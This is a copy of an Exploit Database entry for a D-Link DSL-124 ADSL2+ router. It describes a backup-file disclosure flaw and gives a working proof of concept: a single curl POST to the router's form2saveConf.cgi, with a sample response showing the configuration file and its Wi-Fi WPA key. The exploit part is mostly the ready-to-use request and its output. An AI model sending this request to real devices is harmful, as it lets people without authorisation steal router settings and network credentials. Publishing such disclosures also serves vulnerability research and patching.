DSL-124 Wireless N300 ADSL2+ – Backup File Disclosure

• Exploit Database
• 14 阅读

• 作者： Aryan Chehreghani
  日期： 2023-03-29
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51129/

• # Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure
  # Date:2022-11-10
  # Exploit Author: Aryan Chehreghani
  # Vendor Homepage: https://www.dlink.com
  # Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09
  # Firmware Version: ME_1.00
  # Tested on: Windows 11
  
  # [ Details - DSL-124 ]:
  #The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office,
  #With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection,
  #Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports,
  #the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet.
  
  # [ Description ]:
  #After the administrator enters and a new session is created, the attacker sends a request using the post method in her system,
  #and in response to sending this request, she receives a complete backup of the router settings,
  #In fact this happens because of the lack of management of users and sessions in the network.
  
  # [ POC ]:
  
  Request :
  
  curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST http://192.168.1.1/form2saveConf.cgi
  
  Response :
  
  HTTP/1.1 200 OK
  Connection: close
  Server: Virtual Web 0.9
  Content-Type: application/octet-stream;
  Content-Disposition: attachment;filename="config.img"
  Pragma: no-cache
  Cache-Control: no-cache
  
  <Config_Information_File_8671>
  <V N="WLAN_WPA_PSK" V="pass@12345"/>
  <V N="WLAN_WPA_PSK_FORMAT" V="0x0"/>
  <V N="WLAN_WPA_REKEY_TIME" V=""/>
  <V N="WLAN_ENABLE_1X" V="0x0"/>
  <V N="WLAN_ENABLE_MAC_AUTH" V="0x0"/>
  <V N="WLAN_RS_IP" V="0.0.0.0"/>
  .
  .
  .
  </Config_Information_File_8671>